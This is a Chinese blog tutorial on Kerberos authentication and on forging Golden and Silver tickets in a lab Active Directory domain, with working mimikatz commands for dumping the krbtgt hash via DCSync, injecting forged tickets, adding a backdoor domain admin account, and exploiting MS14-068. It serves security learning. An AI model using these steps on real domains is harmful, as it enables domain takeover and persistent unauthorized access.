一文搞懂黄金白银票据

最新推荐文章于 2024-04-15 00:48:49 发布
最新推荐文章于 2024-04-15 00:48:49 发布
阅读量834 收藏 6
点赞数
分类专栏: kerberos 文章标签: 网络 网络安全 web安全 网络攻击模型 网络协议 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75218183/article/details/131459432
版权

前言:

在学习黄金白银票据之前,我们先要搞懂Kerberos(三头保卫神犬)协议。

Kerberos协议:

介绍:

Kerberos 是一种网络认证协议,其设计目标是通过密钥系统为客户机 / 服务器应用程序提供强大的认证服务。该认证过程的实现不依赖于主机操作系统的认证,无需基于主机地址的信任,不要求网络上所有主机的物理安全,并假定网络上传送的数据包可以被任意地读取、修改和插入数据。在以上情况下, Kerberos 作为一种可信任的第三方认证服务,是通过传统的密码技术(如:共享密钥)执行认证服务的。

认证过程:

1:AS-REQ:客户端向KDC的认证服务请求认购权证

2:AS-REP:身份认证通过后KDC发放认购权证

3:TGS-REQ:客户端拿着认购权证向KDC的票据授予服务器请求服务票据。

4:TGS-REP:身份认证通过后,KDC发放ST服务票据

5:AP-REQ:客户端拿着ST服务票据向服务端请求服务(服务端发送PAC给KDC校验PAC_PRIVSVR_CHECKSUM签名。注意服务端和KDC之间是通过RPC协议通信的,并且这步默认不会发送。KDC返回签名校验结果)

6:AP-REP:这一步是可选的。当客户端希望验证提供服务的服务端时,服务端返回该数据包进行双向认证。双向认证后服务端返回服务资源给客户端

kerberos各个阶段的安全问题:

黄金票据

原理:

krbtgt用户是域控中用来管理发放票据的用户,拥有了该用户的权限,就可以伪造系统中的任意用户,黄金票据就是伪造krbtgt用户的TGT(请求认证权证)票据。因为在kerberos请求的第一阶段的AS-REP中KDC返回的TGT是由Krbtgt用户的密码Hash加密的,因此如果我们有krbtgt的密码Hash就可以自己制作一个TGT,这个票据也被称为黄金票据。

利用前提:

  • 域名称
  • 域的SID值
  • 域的krbtgt用户Hash
  • 伪造用户名

特点:

不需要与AS进行交互,需要用户kebtgt的hash

使用场景:

在我们拿下域控,但是因为版本等一些原因我们抓不到域管理的明文密码,我们需要进行横向渗透,这个时候可以使用黄金票据来做权限维持。

靶场环境:

域:sunday.com

域控:ad01 10.10.10.100

域内主机:dc01 10.10.10.101

利用过程:

使用到的命令:

# 获取域名
whoami
net time /domain
ipconfig /all
    
# 获取SID
whoami /all

# 获取域的KRBTGT账户NTLM密码哈希或者aes-256值(使用mimikatz)
lsadump::dcsync /domain:sunday.com /user:krbtgt /csv

# 伪造管理员用户名
net group "domain admins"

# 伪造TGT
# 清除所有票据
klist purge

# 使用mimikatz伪造指定用户的票据并注入到内存
kerberos::golden  /admin:administrator  /domain:sunday.com  /sid:S-1-5-21-3762639449-1694192139-2733638201  /krbtgt:18a27ee598c1af5962a9e92e9d176780  /ptt

在dc01上未伪造直接访问:

在域控上获取krbtgt的Hash:

在域控上伪造管理员用户名

在dc上使用mimikatz伪造指定用户的票据并注入到内存

成功访问域控

添加域管账户

net user hack 123qwe!@# /add /domain
net user /domain
net group "Domain Admins" hack /add /domain

白银票据

原理:

白银票据是利用伪造ST。Client带着ST和Authenticator3向Server上的某个服务进行请求,Server接收到Client的请求之后,通过自己的Master Key 解密ST,从而获得 Session Key。通过 Session Key 解密 Authenticator3,进而验证对方的身份,验证成功就让 Client 访问server上的指定服务了。

利用前提:

  • 域名称
  • 域的SID值
  • 目标服务器FQDN
  • 可利用的服务(因为白银票据只能访问部分服务,所以必须要清楚什么服务可以利用)
  • server的NTLM Hash
  • 需要伪造的用户名

特点:

不需要与KDC进行交互,需要server的NTLM Hash 只能访问部分服务

使用场景:

在拿到一个普通的域成员权限的时候,可以尝试使用ms14-068伪造一个票据,从而让我们的域用户有域管理员权限。

靶场环境:

域:sunday.com

域控:ad01 10.10.10.100

域内主机:dc01 10.10.10.101

利用过程:

使用到的命令:

# 获取域名
whoami
net time /domain
ipconfig /all
    
# 获取SID
whoami /all

# 目标机器的FQDN
net time /domain  
就是hostname+域名 /target:\\WIN-75NA0949GFB.NOONE.com

# 可以利用的服务CIFS(磁盘共享服务)
/service:CIFS  

# 要伪造的用户名
/user:Administrator

MS14-068伪造票据

MS14-068.exe -u 用户名@域名 -p 密码 -s sid -d 域控服务器ip或者机器名

MS14-068.exe -u huluwa@sunday.com -p QWEasd123 -s S-1-5-21-3762639449-1694192139-2733638201 -d 10.10.10.100

注入票据

mimikatz.exe "kerberos::purge"
mimikatz.exe "kerberos::ptc 证书路径"

成功访问

学安全的鸵鸟
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
网络安全黄金票据白银票据
zxcvbnmasdflzl的博客
05-03 1905
​ Kerberos认证# 在学习黄金白银票据前,首先先了解一下什么是Kerberos认证
一文搞懂混合动力汽车
01-14
经过4S店销售的一顿狂轰乱炸,你还是搞不懂混合动力汽车有插电式与非插电式之分,还有串联式、并联式、混联式的区别。 无妨,接着看下文也许你就懂了! 混合动力汽车透视图 传统汽车由内燃机燃烧...
一文搞懂C语言回调函数
01-27
我们先来看看百度百科是如何定义回调函数的:回调函数就是一个通过函数指针调用的函数。如果你把函数的指针(地址)作为参数传递给另一个函数,当这个指针被用来调用其所指向的函数时,我们就说这是回调函数。回调函数不是由该函数的实现方直接调用,而是在特定的事件或条件发生时由另外的一方调用的,用于对该事件或条件进行响应。这段话比较长,也比较绕口。下面我通过一幅图来说明什么是回调:假设我们要使用一个排序函数来对数组进行排序,那么在主程序(Mainprogram)中,我们先通过库,选择一个库排序函数(Library
一文搞懂Raft算法
01-27
raft是工程上使用较为广泛的强一致性、去中心化、高可用的分布式协议。在这里强调了是在工程上,因为在学术理论界,最耀眼的还是大名鼎鼎的Paxos。但Paxos是:少数真正理解的人觉得简单,尚未理解的人觉得很难,大多数人都是一知半解。本人也花了很多时间、看了很多材料也没有真正理解。直到看到raft的论文,两位研究者也提到,他们也花了很长的时间来理解Paxos,他们也觉得很难理解,于是研究出了raft算法。raft是一个共识算法(consensusalgorithm),所谓共识,就是多个节点对某个事情达成一致的看法,即使是在部分节点故障、网络延时、网络分割的情况下。这些年最为火热的加密货币(比
域权限维持—黄金票据和白金票据
lza20001103的博客
04-15 348
域权限维持—黄金票据和白金票据
一篇文章看懂Kerberos协议
qq_29948489的博客
12-14 350
kerberos是一种计算机网络认证协议,他能够为网络中通信的双方提供严格的身份验证服务,确保通信双方身份的真实性和安全性。不同于其他网络服务,kerberos协议中不是所有的客户端向想要访问的网络服务发起请求,他就能够建立连接然后进行加密通信。而是在发起服务请求后必须先进行一系列的身份认证,包括客户端和服务端两方的双向认证,只有当通信双方都认证通过对方身份之后,才可以互相建立起连接,进行网络通信。
票据传递攻击
qq_56426046的博客
11-12 943
在 Kerberos 认证中,Client 通过 AS(身份认证服务)认证后,AS 会给Client 一个Logon Session Key 和 TGT,而 Logon Session Key 并不会保存在KDC 中,krbtgt 的NTLM Hash 又是固定的,所以只要得到 krbtgt 的 NTLM Hash,就可以伪造TGT和Logon Session Key 来进入下一步 Client 与 TGS 的交互。白银票据的利用过程是伪造TGS,通过已知的授权服务密码生成一张可以访问该服务的TGT。
白银票据黄金票据的一些学习
dayouzi的博客
08-11 582
Golden Ticket(金票)是通过伪造TGT(TickerGranting Ticket),因为只要有了高权限的TGT,那么就可以发送给TGS换取任意服务的ST。可以说有了金票就有了域内的最高权限。对于攻击者来说,只要拿到了域控权限,就可以直接导出krbtgt的Hash值,再通过mimikatz即可生成任意用户任何权限的Ticket,也就是Golden Ticket。
黄金票据白银票据详解
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
06-22 4844
在 Windows 系统中,存在许多突破用户权限或绕过系统保护机制的漏洞,攻击者可以通过利用这些漏洞,提升自己的权限并获取黄金票据。​ Golden Ticket是通过伪造的TGT(由身份认证服务授予的票据,用于身份认证,存储在内存,默认有效期为10小时),因为只要有了高权限的TGT,那么就可以发送给TGS(票据授予服务)换取任意服务的ST。​ 每个用户的Ticket都是由krbtgt的密码Hash来生成的,那么,我们如果拿到了krbtgt的密码Hash,其实就可以伪造任意用户的TICKET,
「Active Directory Sec」白银票据黄金票据
dr0op's blog
07-12 853
白银票据: 即伪造的TGS。当获取需要访问的目标服务器NTLM HASH后,就可以利用Mimikatz伪造TGS,直接去访问目标服务器。此过程不需要KDC的参与。但缺点是只能访问一个服务。黄金票据: 即伪造TGT。当攻击者拥有普通域账户,krbtgt ntlm hash ,域SID时,就可以伪造TGT。拥有黄金票据就拥有了域内所有的访问控制权限。 通过Kerberos的通信过程就可以看出,当攻击者获取krbtgt的HASH值时,就可以利用这个HASH去伪造TGT,票据授予票据,在以后每一次的通信过程中,Cl
内网渗透——黄金票据白银票据
来日可期的博客
10-11 2403
黄金票据(Golden Ticket):黄金票据指的是攻击者通过获取目标环境中域控制器(Domain Controller)上的krbtgt帐户的散列值,然后使用散列值生成伪造的票据。这种伪造的票据具有极高的权限,并且不受密码更改的影响。拥有黄金票据相当于拥有域内的最高权限,攻击者可以访问和控制所有域内资源。 白银票据(Silver Ticket):白银票据是攻击者通过获取目标环境中某个服务帐户(Service Account)的散列值,并使用散列值生成伪造的票据。这种伪造的票据允许攻击者模拟该服务账户的
白银票据/黄金票据构造分析
灰太的表格的博客
10-29 901
白银票据/黄金票据构造分析
网络知识扫盲,一文搞懂DNS
02-24
在找工作面试的过程中,面试官非常喜欢考察基础知识,除了数据结构与算法之外,网络知识也是一个非常重要的考察对象。而网络知识,通常是很抽象,不容易理解的,有很多同学就在这里裁了跟头。为了更好地通过面试,...
域权限维持(黄金票据白银票据)
qq_18811919的博客
03-19 1879
黄金票据白银票据通常被认为属于票据传递攻击(Pass-the-Ticket,简称PTT)的一种。 这是一种针对Windows身份验证系统的攻击,攻击者可以利用缺陷或弱点获取用户或系统 帐户的票据信息,然后将其用于进一步攻击或访问敏感资源本篇文章注意讲述了黄金票据白银票据的数据包分析以及如何进行PTT攻击,讲述了多种利用方式包括CS/mimikatz/Impacket等。
内网横向移动|PTT票据传递横向|Mimikatz Kerberos
qq_60115503的博客
04-25 3106
票据传递攻击(Pass the Ticket,PtT) 票据传递攻击(PtT)是基于Kerberos认证的一种攻击方法,常用来做后渗透权限维持,黄金票据攻击利用的前提是得到了域内krbtgt用户的NTLM哈希或者AES-256的值,白银票据攻击利用的前提是得到了域内服务账号的NTLM哈希或者AES-256的值,票据传递攻击用来做域控权限维持 什么是Krbtgt用户 每个域控制器都有一个krbtgt用户账户,是KDC的服务的账户,用来创建票据授予服务(TGS)加密的密钥kerber...
黄金票据制作-新手入门
weixin_42109829的博客
12-27 2287
0x01 前言 相信准备学习内网渗透的人,都会知道有黄金票据这个事情,而黄金票据的原理是和攻击方式,网站说的都一大堆概念,很难懂,这里我说声明一下,黄金票据的作用在于做权限维持 ,原理在于域服务器上有一个krbtgt用户 0x02 黄金票据krbtgt 用户的关系 ​ Golden Ticket(下面称为金票)是通过伪造的TGT(由身份认证服务授予的票据,用于身份认证,存储在内存,默认有效期为10小时),因为只要有了高权限的TGT,那么就可以发送给TGS(票据授予服务)换取任意服务的ST。可以说有了金票
黄金票据传递攻击
2301_79742437的博客
01-28 536
网络安全
黄金票据的原理和使用
qq_45455136的博客
09-28 1136
krbtgt用户是系统在创建域时自动生成的账号,密码是随机生成的,无法登录主机,是KDC(密钥分发中心)的服务账号。在域环境中,每个用户账号的票据都是由 krbtgt 用户所生成的 TGT票据加密使用的TGS(票据授予服务器)密码就是krbtgt用户的NTLM Hash Kerberos中的TGT和CT_SK是AS(认证服务器)返回的,TGT是由krbtgt加密和签名的,krbtgt的NTLM Hash是固定的,CT_SK不会保存在KDC中 得到krbtgt的NTLM Hash就可以伪造
域渗透之黄金票据白银票据
dys的博客
07-19 473
黄金票据白银票据 kerberos协议
一文搞懂yolov9训练
最新发布
04-19
YOLOv9是一种目标检测算法,它是YOLO(You Only Look Once)系列算法的最新版本。相比于之前的版本,YOLOv9在准确性和速度方面都有所提升。 YOLOv9的训练过程可以分为以下几个步骤: 1. 数据准备:首先需要准备训练所需的数据集,包括标注好的图像和对应的标签。标签通常包含目标的类别和位置信息。 2. 模型选择:根据实际需求选择合适的YOLOv9模型,YOLOv9提供了不同尺度的模型,可以根据目标大小和计算资源进行选择。 3. 模型配置:配置模型的超参数,包括输入图像尺寸、训练批次大小、学习率等。这些参数会影响模型的训练效果和速度。 4. 模型初始化:使用预练的权重文件初始化模型,这有助于加快型的收敛速度。 5. 损失函数定义:定义用于计算模型损失的函数,YOLOv9使用了多个损失函数来同时优化目标类别预测、位置回归和目标置信度。 6. 训练过程:通过反向传播算法和优化器对模型进行训练。训练过程中,模型会根据损失函数的反馈进行参数更新,逐渐提高模型的准确性。 7. 模型评估:训练完成后,需要对模型进行评估,通常使用验证集或测试集来评估模型在未见过的数据上的性能。 8. 模型调优:根据评估结果,可以对模型进行调优,例如调整超参数、增加训练数据、使用数据增强等方法来提高模型的性能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值